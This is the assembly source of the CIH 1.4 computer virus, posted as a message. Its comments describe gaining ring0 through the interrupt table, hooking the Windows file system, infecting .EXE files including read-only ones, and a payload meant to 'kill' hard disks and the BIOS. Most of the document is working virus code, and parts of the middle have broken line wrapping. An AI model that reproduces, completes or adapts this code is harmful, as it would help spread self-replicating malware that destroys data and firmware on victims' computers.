Subject: CIH 1.4 source code
From: williamlong()
Compiled by: williamlong (1999-04-28 11:35:27), internal mail
; ****************************************************************************
; *                     The Virus Program Information                        *
; ****************************************************************************
; *                                                                          *
; *     Designer : CIH                  Source : TTIT of TATUNG in Taiwan    *
; *     Create Date : 04/26/1998        Now Version : 1.4                    *
; *     Modification Time : 05/31/1998                                       *
; *                                                                          *
; *     Turbo Assembler Version 4.0     : tasm /m cih                        *
; *     Turbo Link Version 3.01         : tlink /3 /t cih, cih.exe           *
; *                                                                          *
; *==========================================================================*
; *                     Modification History                                 *
; *==========================================================================*
; *     v1.0    1. Create the Virus Program.                                 *
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *             6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *             7. It is also Infected, even the File is Read-Only.          *
; *             8. When the File is Infected, the Modification Date and Time *
; *                of the File also don't be Changed.                        *
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *                Previous FileSystemApiHook, it will Call the Function     *
; *                that the IFS Manager Would Normally Call to Implement     *
; *                this Particular I/O Request.                              *
; *            10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; *     v1.1    1. Especially, the File that be Infected will not Increase   *
; *                its Size...   ^__^                                        *
; * 05/15/1998  2. Hook and Modify Structured Exception Handling.            *
; *                When Exception Error Occurs, Our OS System should be in   *
; *                Windows NT. So My Cute Virus will not Continue to Run,    *
; *                it will Jump to Original Application to Run.              *
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
; *==========================================================================*
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *             2. Modify the Bug of v1.1                                    *
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *
; *==========================================================================*
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
; *==========================================================================*
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *             2. Change the Date of Killing Computers.                     *
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
; ****************************************************************************

                .586P

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                dd      00000000h, VirusSize

                        lea     ecx, StopToRunVirusCode-@0[ebx]
                        push    ecx

                        push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;

                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0

                        cli

                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point

                        lea     esi, MyExceptionHook-@1[ecx]

                        push    esi

                        mov     [ebx-04h], si           ;
                        shr     esi, 16                 ; Modify Exception
                        mov     [ebx+02h], si           ; Entry Point Address

                        pop     esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

                        int     HookExceptionNumber     ; GenerateException
ReturnAddressOfEndException     =       $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

; *************************************
; * Generate Exception Again          *
; *************************************

                        int     HookExceptionNumber     ; GenerateException Again


; *************************************
; * Let's Restore                     *
; * Structured Exception Handling     *
; *************************************

ReadyRestoreSE:
                        sti

                        xor     ebx, ebx

                        jmp     RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jumps to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1                      =       StopToRunVirusCode

                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]

RestoreSE:
                        pop     dword ptr fs:[ebx]
                        pop     eax

; *************************************
; * Return Original App to Execute    *
; *************************************

                        pop     ebp

                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack

                        ret     ; Return to Original App Entry Point

; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2                      =       MyExceptionHook

                        jz      InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

                        mov     ecx, dr0
                        jecxz   AllocateSystemMemoryPage

                        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init:
                        mov     [ebx-04h], bp   ;
                        shr     ebp, 16         ; Restore Exception
                        mov     [ebx+02h], bp   ;

                        iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

                        mov     dr0, ebx        ; Set the Mark of My Virus Exist in System

                        push    00000000fh      ;
                        push    ecx             ;
                        push    0ffffffffh      ;
                        push    ecx             ;
                        push    ecx             ;
                        push    ecx             ;
                        push    000000001h      ;
                        push    000000002h      ;
                        int     20h             ; VMMCALL _PageAllocate
_PageAllocate           =       $               ;
                        dd      00010053h       ; Use EAX, ECX, EDX, and flags
                        add     esp, 08h*04h

                        xchg    edi, eax        ; EDI = SystemMemory Start Address

                        lea     eax, MyVirusStart-@2[esi]

                        iretd   ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook:

                        lea     eax, FileSystemApiHook-@6[edi]

                        push    eax  ;
                        int     20h  ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $       ;
                        dd      00400067h       ; Use EAX, ECX, EDX, and flags

                        mov     dr0, eax        ; Save OldFileSystemApiHook Address

                        pop     eax     ; EAX = FileSystemApiHook Address

                        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
                        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
                        mov     edx, [ecx]
                        mov     OldInstallFileSystemApiHook-@3[eax], edx

                        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
                        lea     eax, InstallFileSystemApiHook-@3[eax]
                        mov     [ecx], eax

                        cli

                        jmp     ExitRing0Init

; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************

CodeSizeOfMergeVirusCodeSection         =       offset $

; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************

InstallFileSystemApiHook:                                             
           
                        push    ebx                                   
           
                                                                      
           
                        call    @4      ;                             
           
@4:                                     ;                             
           
                        pop     ebx     ; mov ebx, offset FileSystemAp
iHook      
                        add     ebx, FileSystemApiHook-@4       ;     
           
                                                                      
           
                        push    ebx                                   
           
                        int     20h  ; VXDCALL IFSMgr_RemoveFileSystem
ApiHook    
IFSMgr_RemoveFileSystemApiHook  =       $                             
           
                        dd      00400068h       ; Use EAX, ECX, EDX, a
nd flags   
                        pop     eax                                   
           
                                                                      
           
                        ; Call Original IFSMgr_InstallFileSystemApiHoo
k          
                        ; to Link Client FileSystemApiHook            
           
                        push    dword ptr [esp+8]                     
           
                        call    OldInstallFileSystemApiHook-@3[ebx]   
           
                        pop     ecx                                   
           
                                                                      
           
                        push    eax                                   
           
                                                                      
           
                        ; Call Original IFSMgr_InstallFileSystemApiHoo
k          
                        ; to Link My FileSystemApiHook                
           
                        push    ebx                                   
           
                        call    OldInstallFileSystemApiHook-@3[ebx]   
           
                        pop     ecx                                   
           
                                                                      
           
                        mov     dr0, eax        ; Adjust OldFileSystem
ApiHook A  
ress                                                                  
           
                                                                      
           
                        pop     eax                                   
           
                                                                      
           
                        pop     ebx                                   
           
                                                                      
           
                        ret                                           
           
                                                                      
           
; *********************************************************           
           
; *                     Static Data                       *           
           
; *********************************************************           
           
                                                                      
           
OldInstallFileSystemApiHook     dd      ?                             
           
                                                                      
           
; *********************************************************           
           
; *             IFSMgr_FileSystemHook                     *           
           
; *********************************************************           
           
                                                                      
           
; *************************************                               
           
; * IFSMgr_FileSystemHook Entry Point *                               
           
; *************************************                               
           
                                                                      
           
FileSystemApiHook:                                                    
           
@3                      =       FileSystemApiHook                     
           
                                                                      
           
                        pushad                                        
           
                                                                      
           
                        call    @5      ;                             
           
@5:                                     ;                             
           
                        pop     esi     ; mov esi, offset VirusGameDat
aStartAdd  
ss                                                                    
           
                        add     esi, VirusGameDataStartAddress-@5     
           
                                                                      
           
; *************************************                               
           
; * Is OnBusy !?                      *                               
           
; *************************************                               
           
                                                                      
           
                        test    byte ptr (OnBusy-@6)[esi], 01h  ; if (
 OnBusy )  
                        jnz     pIFSFunc                        ; goto
 pIFSFunc  
                                                                      
           
; *************************************                               
           
; * Is OpenFile !?                    *                               
           
; *************************************                               
           
                                                                      
           
                        ; if ( NotOpenFile )                          
           
                        ; goto prevhook                               
           
                        lea     ebx, [esp+20h+04h+04h]                
           
                        cmp     dword ptr [ebx], 00000024h            
           
                        jne     prevhook                              
           
                                                                      
           
; *************************************                               
           
; * Enable OnBusy                     *                               
           
; *************************************                               
           
                                                                      
           
                        inc     byte ptr (OnBusy-@6)[esi]       ; Enable OnBusy
                                                                      
           
; *************************************                               
           
; * Get FilePath's DriveNumber,       *                               
           
; * then Set the DriveName to         *                               
           
; * FileNameBuffer.                   *                               
           
; *************************************                               
           
; * Ex. If DriveNumber is 03h,        *                               
           
; *     DriveName is 'C:'.            *                               
           
; *************************************                               
           
                                                                      
           
                        ; mov esi, offset FileNameBuffer              
           
                        add     esi, FileNameBuffer-@6                
           
                                                                      
           
                        push    esi                                   
           
                                                                      
           
                        mov     al, [ebx+04h]                         
           
                        cmp     al, 0ffh                              
           
                        je      CallUniToBCSPath                      
           
                                                                      
           
                        add     al, 40h                               
           
                        mov     ah, ':'                               
           
                                                                      
           
                        mov     [esi], eax                            
           
                                                                      
           
                        inc     esi                                   
           
                        inc     esi                                   
           
                                                                      
           
; *************************************                               
           
; * UniToBCSPath                      *                               
           
; *************************************                               
           
; * This Service Converts             *                               
           
; * a Canonicalized Unicode Pathname  *                               
           
; * to a Normal Pathname in the       *                               
           
; * Specified BCS Character Set.      *                               
           
; *************************************                               
           
                                                                      
           
CallUniToBCSPath:                                                     
           
                        push    00000000h                             
           
                        push    FileNameBufferSize                    
           
                        mov     ebx, [ebx+10h]                        
           
                        mov     eax, [ebx+0ch]                        
           
                        add     eax, 04h                              
           
                        push    eax                                   
           
                        push    esi                                   
           
                        int     20h     ; VXDCall UniToBCSPath        
           
UniToBCSPath            =       $                                     
           
                        dd      00400041h                             
           
                        add     esp, 04h*04h                          
           
                                                                      
           
; *************************************                               
           
; * Is FileName '.EXE' !?             *                               
           
; *************************************                               
           
                                                                      
           
                        ; cmp [esi+eax-04h], '.EXE'                   
           
                        cmp     [esi+eax-04h], 'EXE.'                 
           
                        pop     esi                                   
           
                        jne     DisableOnBusy                         
           
                                                                      
           
IF      DEBUG                                                         
           
                                                                      
           
; *************************************                               
           
; * Only for Debug                    *                               
           
; *************************************                               
           
                                                                      
           
                        ; cmp [esi+eax-06h], 'FUCK'                   
           
                        cmp     [esi+eax-06h], 'KCUF'                 
           
                        jne     DisableOnBusy                         
           
                                                                      
           
ENDIF                                                                 
           
                                                                      
           
; *************************************                               
           
; * Is Open Existing File !?          *                               
           
; *************************************                               
           
                                                                      
           
                        ; if ( NotOpenExistingFile )                  
           
                        ; goto DisableOnBusy                          
           
                        cmp     word ptr [ebx+18h], 01h               
           
                        jne     DisableOnBusy                         
           
                                                                      
           
; *************************************                               
           
; * Get Attributes of the File        *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4300h                             
           
                        int     20h     ; VXDCall IFSMgr_Ring0_FileIO 
           
IFSMgr_Ring0_FileIO     =       $                                     
           
                        dd      00400032h                             
           
                                                                      
           
                        jc      DisableOnBusy                         
           
                                                                      
           
                        push    ecx                                   
           
                                                                      
           
; *************************************                               
           
; * Get IFSMgr_Ring0_FileIO Address   *                               
           
; *************************************                               
           
                                                                      
           
                        mov     edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
                        mov     edi, [edi]                            
           
                                                                      
           
; *************************************                               
           
; * Is Read-Only File !?              *                               
           
; *************************************                               
           
                                                                      
           
                        test    cl, 01h                               
           
                        jz      OpenFile                              
           
                                                                      
           
; *************************************                               
           
; * Modify Read-Only File to Write    *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4301h                             
           
                        xor     ecx, ecx                              
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; *************************************                               
           
; * Open File                         *                               
           
; *************************************                               
           
                                                                      
           
OpenFile:                                                             
           
                        xor     eax, eax                              
           
                        mov     ah, 0d5h                              
           
                        xor     ecx, ecx                              
           
                        xor     edx, edx                              
           
                        inc     edx                                   
           
                        mov     ebx, edx                              
           
                        inc     ebx                                   
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
                        xchg    ebx, eax        ; mov ebx, FileHandle 
           
                                                                      
           
; *************************************                               
           
; * Need to Restore                   *                               
           
; * Attributes of the File !?         *                               
           
; *************************************                               
           
                                                                      
           
                        pop     ecx                                   
           
                                                                      
           
                        pushf                                         
           
                                                                      
           
                        test    cl, 01h                               
           
                        jz      IsOpenFileOK                          
           
                                                                      
           
; *************************************                               
           
; * Restore Attributes of the File    *                               
           
; *************************************                               
           
                                                                      
           
                        mov     ax, 4301h                             
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; *************************************                               
           
; * Is Open File OK !?                *                               
           
; *************************************                               
           
                                                                      
           
IsOpenFileOK:                                                         
           
                        popf                                          
           
                                                                      
           
                        jc      DisableOnBusy                         
           
                                                                      
           
; *************************************                               
           
; * Open File Already Succeed.   ^__^ *                               
           
; *************************************                               
           
                                                                      
           
                        push    esi     ; Push FileNameBuffer Address to Stack
                                                                      
           
                        pushf           ; Now CF = 0, Push Flag to Stack
                                                                      
           
                        add     esi, DataBuffer-@7 ; mov esi, offset DataBuffer
                                                                      
           
; ***************************                                         
           
; * Get OffsetToNewHeader   *                                         
           
; ***************************                                         
           
                                                                      
           
                        xor     eax, eax                              
           
                        mov     ah, 0d6h                              
           
                                                                      
           
                        ; For Doing Minimal VirusCode's Length,       
           
                        ; I Save EAX to EBP.                          
           
                        mov     ebp, eax                              
           
                                                                      
           
                        push    00000004h                             
           
                        pop     ecx                                   
           
                        push    0000003ch                             
           
                        pop     edx                                   
           
                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO 
           
                                                                      
           
; * EDX = 'PE\0\0' Signature of       *                               
           
; *       ImageFileHeader Pointer's   *                               
           
; *       Former Byte.                *                               
           
; * ESI = DataBuffer Address ==> @8   *                               
           
; * EDI = IFSMgr_Ring0_FileIO Address *                               
           
; * EBP = D600h ==> Read Data in File *                               
           
; *************************************                               
           
; * Stack Dump :                      *                               
           
; *                                   *                               
           
; * ESP => -------------------------  *                               
           
; *        |       EFLAG(CF=0)     |  *                               
           
; *        -------------------------  *                               
           
; *        | FileNameBufferPointer |  *                               
           
; *        -------------------------  *                               
           
; *        |          EDI          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ESI          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EBP          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ESP          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EBX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EDX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          ECX          |  *                               
           
; *        -------------------------  *                               
           
; *        |          EAX          |  *                               
           
; *        -------------------------  *                               
           
; *        |     Return Address    |  *                               
           
; *        -------------------------  *                               
           
; *************************************                               
           
                                                                      
           
                        push    ebx     ; Save File Handle            
           
                                                                      
           
                        push    00h     ; Set VirusCodeSectionTableEndMark
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * Virus' Infected Mark    *                                         
           
; ***************************                                         
           
                                                                      
           
                        push    01h     ; Size                        
           
                        push    edx     ; Pointer of File             
           
                        push    edi     ; Address of Buffer           
           
                                                                      
           
; ***************************                                         
           
; * Save ESP Register       *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     dr1, esp                              
           
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * NewAddressOfEntryPoint  *                                         
           
; * ( Only First Set Size ) *                                         
           
; ***************************                                         
           
                                                                      
           
                        push    eax     ; Size                        
           
                                                                      
           
; ***************************                                         
           
; * Let's Read              *                                         
           
; * Image Header in File    *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     eax, ebp                              
           
                        mov     cl, SizeOfImageHeaderToRead           
           
                        add     edx, 07h ; Move EDX to NumberOfSections
                        call    edi      ; VXDCall IFSMgr_Ring0_FileIO
           
                                                                      
           
; ***************************                                         
           
; * Let's Set the           *                                         
           
; * NewAddressOfEntryPoint  *                                         
           
; * ( Set Pointer of File,  *                                         
           
; *   Address of Buffer   ) *                                         
           
; ***************************                                         
           
                                                                      
           
                        lea     eax, (AddressOfEntryPoint-@8)[edx]    
           
                        push    eax     ; Pointer of File             
           
                                                                      
           
                        lea     eax, (NewAddressOfEntryPoint-@8)[esi] 
           
                        push    eax     ; Address of Buffer           
           
                                                                      
           
; ***************************                                         
           
; * Move EDX to the Start   *                                         
           
; * of SectionTable in File *                                         
           
; ***************************                                         
           
                                                                      
           
                        movzx   eax, word ptr (SizeOfOptionalHeader-@8)[esi]
                        lea     edx, [eax+edx+12h]                    
           
                                                                      
           
; ***************************                                         
           
; * Let's Get               *                                         
           
; * Total Size of Sections  *                                         
           
; ***************************                                         
           
                                                                      
           
                        mov     al, SizeOfScetionTable                
           
                                                                      
           
                        ; I Assume NumberOfSections <= 0ffh

                        mov     cl, (NumberOfSections-@8)[esi]



                        mul     cl



; ***************************

; * Let's Set Section Table *

; ***************************



                        ; Move ESI to the Start of SectionTable

                        lea     esi, (StartOfSectionTable-@8)[esi]



                        push    eax     ; Size

                        push    edx     ; Pointer of File

                        push    esi     ; Address of Buffer



; ***************************

; * The Code Size of Merge  *

; * Virus Code Section and  *

; * Total Size of Virus     *

; * Code Section Table Must *

; * be Small or Equal the   *

; * Unused Space Size of    *

; * Following Section Table *

; ***************************



                        inc     ecx

                        push    ecx     ; Save NumberOfSections+1



                        shl     ecx, 03h

                        push    ecx     ; Save TotalSizeOfVirusCodeSectionTable


                        add     ecx, eax

                        add     ecx, edx



                        sub     ecx, (SizeOfHeaders-@9)[esi]

                        not     ecx

                        inc     ecx



                        ; Save My Virus First Section Code

                        ; Size of Following Section Table...

                        ; ( Not Include the Size of Virus Code Section Table )
                        push    ecx



                        xchg    ecx, eax        ; ECX = Size of Section Table


                        ; Save Original Address of Entry Point

                        mov     eax, (AddressOfEntryPoint-@9)[esi]

                        add     eax, (ImageBase-@9)[esi]

                        mov     (OriginalAddressOfEntryPoint-@9)[esi], eax


                        cmp     word ptr [esp], small CodeSizeOfMergeVirusCodeSection

                        jl      OnlySetInfectedMark



; ***************************

; * Read All Section Tables *

; ***************************



                        mov     eax, ebp

                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO



; ***************************

; * Full Modify the Bug :   *

; * WinZip Self-Extractor   *

; * Occurs Error...         *

; ***************************

; * So When User Opens      *

; * WinZip Self-Extractor,  *

; * Virus Doesn't Infect it.*

; ***************************

; * First, Virus Gets the   *

; * PointerToRawData in the *

; * Second Section Table,   *

; * Reads the Section Data, *

; * and Tests the String of *

; * 'WinZip(R)'......       *

; ***************************



                        xchg    eax, ebp



                        push    00000004h

                        pop     ecx



                        push    edx

                        mov     edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]

                        add     edx, 12h



                        call    edi     ; VXDCall IFSMgr_Ring0_FileIO



                        ; cmp [esi], 'nZip'

                        cmp     dword ptr [esi], 'piZn'

                        je      NotSetInfectedMark



                        pop     edx



; ***************************

; * Let's Set Total Virus   *

; * Code Section Table      *

; ***************************



                        ; EBX = My Virus First Section Code

                        ; Size of Following Section Table

                        pop     ebx

                        pop     edi     ; EDI = TotalSizeOfVirusCodeSectionTable
                        pop     ecx     ; ECX = NumberOfSections+1



                        push    edi     ; Size



                        add     edx, ebp

                        push    edx     ; Pointer of File



                        add     ebp, esi
